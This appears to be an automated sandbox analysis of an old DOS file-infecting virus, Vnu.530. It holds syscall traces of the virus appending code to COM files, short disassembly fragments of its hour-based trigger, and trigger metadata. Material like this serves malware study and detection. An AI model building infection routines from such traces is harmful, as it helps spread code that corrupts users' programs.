Sample viewer

vx.netlux.org/Virus.DOS.Vnu.530

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:10:26.771906026Z 78 PC: 12b2a | Find first file
2018-12-17T23:10:26.776389207Z 61 PC: 12b4c | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:10:26.780324535Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.784340477Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.785872023Z 66 PC: 12b9b | Move file pointer
2018-12-17T23:10:26.786900435Z 64 PC: 12ba6 | Write file or device (Write 6 bytes on handle 5)
2018-12-17T23:10:26.789123023Z 66 PC: 12baf | Move file pointer
2018-12-17T23:10:26.791044517Z 64 PC: 12bba | Write file or device (Write 31 bytes on handle 5)
2018-12-17T23:10:26.793020527Z 64 PC: 12bdf | Write file or device (Write 499 bytes on handle 5)
2018-12-17T23:10:26.803725812Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.809521615Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.816443099Z 61 PC: 12b4c | Open file (Filename = 'PRINT.COM')
2018-12-17T23:10:26.821298401Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.82689177Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.830729625Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.832231684Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.83549513Z 61 PC: 12b4c | Open file (Filename = 'HELLO.COM')
2018-12-17T23:10:26.84010446Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.846939276Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.848946069Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.852576287Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.855596665Z 61 PC: 12b4c | Open file (Filename = 'PHANG.COM')
2018-12-17T23:10:26.862362536Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.870008447Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.871680777Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.87346215Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.879102645Z 61 PC: 12b4c | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:10:26.8858251Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.892572486Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.895057875Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.896962304Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.8996907Z 61 PC: 12b4c | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:10:26.907444962Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.913678221Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.915018372Z 66 PC: 12b9b | Move file pointer
2018-12-17T23:10:26.916527467Z 64 PC: 12ba6 | Write file or device (Write 6 bytes on handle 5)
2018-12-17T23:10:26.920121717Z 66 PC: 12baf | Move file pointer
2018-12-17T23:10:26.921700295Z 64 PC: 12bba | Write file or device (Write 31 bytes on handle 5)
2018-12-17T23:10:26.92974153Z 64 PC: 12bdf | Write file or device (Write 499 bytes on handle 5)
2018-12-17T23:10:26.939006383Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.947082962Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.94988518Z 61 PC: 12b4c | Open file (Filename = 'PAH.COM')
2018-12-17T23:10:26.956997329Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.963497697Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.964750839Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.96781124Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.970490046Z 61 PC: 12b4c | Open file (Filename = 'TEST.COM')
2018-12-17T23:10:26.976837522Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.979829095Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.981684568Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.984073613Z 44 PC: 12bf7 | Get time
0x12bf7: cmp ch, 9
0x12bfa: je 0x12c01
0x12bfc: mov ax, 0x100
0x12bff: jmp ax
0x12c01: mov ah, 0x3c
0x12c03: mov cx, 0x20
0x12c06: lea dx, word ptr [bp + 0x2f9]
0x12c0a: int 0x21
0x12c0c: jb 0x12c10
0x12c0e: jmp 0x12c1a
0x12c10: mov al, byte ptr [0x2f9]
0x12c13: inc al
0x12c15: mov byte ptr [0x2f9], al
0x12c18: jmp 0x12c01
0x12c1a: xchg ax, bx
0x12c1b: mov ah, 0x40
0x12c1d: lea dx, word ptr [bp + 0x19b]
0x12c21: mov cx, 0x2d
0x12c24: int 0x21
0x12c26: mov ah, 0x3d

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16857,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:06.481920029Z 78 PC: 12b2a | Find first file
2018-12-25T12:54:06.48841647Z 61 PC: 12b4c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:06.494689537Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-25T12:54:06.501036292Z 66 PC: 12b7b | Move file pointer
2018-12-25T12:54:06.502493443Z 66 PC: 12b9b | Move file pointer
2018-12-25T12:54:06.503658529Z 64 PC: 12ba6 | Write file or device (Write 6 bytes on handle 5)
2018-12-25T12:54:06.506091733Z 66 PC: 12baf | Move file pointer
2018-12-25T12:54:06.507617405Z 64 PC: 12bba | Write file or device (Write 31 bytes on handle 5)
2018-12-25T12:54:06.510392439Z 64 PC: 12bdf | Write file or device (Write 499 bytes on handle 5)
2018-12-25T12:54:06.523936525Z 62 PC: 12be3 | Close file
2018-12-25T12:54:06.532042177Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.53450021Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.540762365Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.547802766Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.54925861Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.550846853Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.553887043Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.5604027Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.56745463Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.569055869Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.570779922Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.573365774Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.579899496Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.586331565Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.587962645Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.589955454Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.593737527Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.599998257Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.606034117Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.607781228Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.609314129Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.611777868Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.619299544Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.625404395Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.626897109Z 66 PC: 12b9b | Move file pointer (See above)
2018-12-25T12:54:06.63121352Z 64 PC: 12ba6 | Write file or device (See above)
2018-12-25T12:54:06.634084605Z 66 PC: 12baf | Move file pointer (See above)
2018-12-25T12:54:06.635803819Z 64 PC: 12bba | Write file or device (See above)
2018-12-25T12:54:06.644594844Z 64 PC: 12bdf | Write file or device (See above)
2018-12-25T12:54:06.652419397Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.660126842Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.663234813Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.669547867Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.675672428Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.677371144Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.67943591Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.683178456Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.68952566Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.692535231Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.694184844Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.696654805Z 44 PC: 12bf7 | Get time
0x12bf7: cmp ch, 9
0x12bfa: je 0x12c01
0x12bfc: mov ax, 0x100
0x12bff: jmp ax
0x12c01: mov ah, 0x3c
0x12c03: mov cx, 0x20
0x12c06: lea dx, word ptr [bp + 0x2f9]
0x12c0a: int 0x21
0x12c0c: jb 0x12c10
0x12c0e: jmp 0x12c1a
0x12c10: mov al, byte ptr [0x2f9]
0x12c13: inc al
0x12c15: mov byte ptr [0x2f9], al
0x12c18: jmp 0x12c01
0x12c1a: xchg ax, bx
0x12c1b: mov ah, 0x40
0x12c1d: lea dx, word ptr [bp + 0x19b]
0x12c21: mov cx, 0x2d
0x12c24: int 0x21
0x12c26: mov ah, 0x3d

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":9,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16857,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:06.806130381Z 78 PC: 12b2a | Find first file
2018-12-25T12:54:06.814548899Z 61 PC: 12b4c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:06.82242648Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-25T12:54:06.82991761Z 66 PC: 12b7b | Move file pointer
2018-12-25T12:54:06.832904166Z 66 PC: 12b9b | Move file pointer
2018-12-25T12:54:06.83501052Z 64 PC: 12ba6 | Write file or device (Write 6 bytes on handle 5)
2018-12-25T12:54:06.838290706Z 66 PC: 12baf | Move file pointer
2018-12-25T12:54:06.840208389Z 64 PC: 12bba | Write file or device (Write 31 bytes on handle 5)
2018-12-25T12:54:06.844971351Z 64 PC: 12bdf | Write file or device (Write 499 bytes on handle 5)
2018-12-25T12:54:06.860300248Z 62 PC: 12be3 | Close file
2018-12-25T12:54:06.869524579Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.873542224Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.88083663Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.888257048Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.89085321Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.892855634Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.895822386Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.903915805Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.911182685Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.912977112Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.915416297Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.919398064Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.927526762Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.935222844Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.938273182Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.94044034Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.943592789Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.952703477Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.960076364Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.96203905Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.964841144Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.967874011Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.975464418Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.983241426Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.984880143Z 66 PC: 12b9b | Move file pointer (See above)
2018-12-25T12:54:06.986247245Z 64 PC: 12ba6 | Write file or device (See above)
2018-12-25T12:54:06.990009406Z 66 PC: 12baf | Move file pointer (See above)
2018-12-25T12:54:06.991993962Z 64 PC: 12bba | Write file or device (See above)
2018-12-25T12:54:07.002175217Z 64 PC: 12bdf | Write file or device (See above)
2018-12-25T12:54:07.01088891Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:07.020346267Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:07.023043508Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:07.030054165Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:07.0378453Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:07.039461563Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:07.041290127Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:07.044581857Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:07.051798617Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:07.055391551Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:07.058181894Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:07.060945663Z 44 PC: 12bf7 | Get time
0x12bf7: cmp ch, 9
0x12bfa: je 0x12c01
0x12bfc: mov ax, 0x100
0x12bff: jmp ax
0x12c01: mov ah, 0x3c
0x12c03: mov cx, 0x20
0x12c06: lea dx, word ptr [bp + 0x2f9]
0x12c0a: int 0x21
0x12c0c: jb 0x12c10
0x12c0e: jmp 0x12c1a
0x12c10: mov al, byte ptr [0x2f9]
0x12c13: inc al
0x12c15: mov byte ptr [0x2f9], al
0x12c18: jmp 0x12c01
0x12c1a: xchg ax, bx
0x12c1b: mov ah, 0x40
0x12c1d: lea dx, word ptr [bp + 0x19b]
0x12c21: mov cx, 0x2d
0x12c24: int 0x21
0x12c26: mov ah, 0x3d
2018-12-25T12:54:07.063242778Z 60 PC: 12c0c | Create or truncate file
2018-12-25T12:54:07.407088065Z 64 PC: 12c26 | Write file or device (Write 45 bytes on handle 5)
2018-12-25T12:54:07.416311394Z 61 PC: 12c2a | Open file (Filename = 'Dedicated to the memory of Kurt Donald Cobain')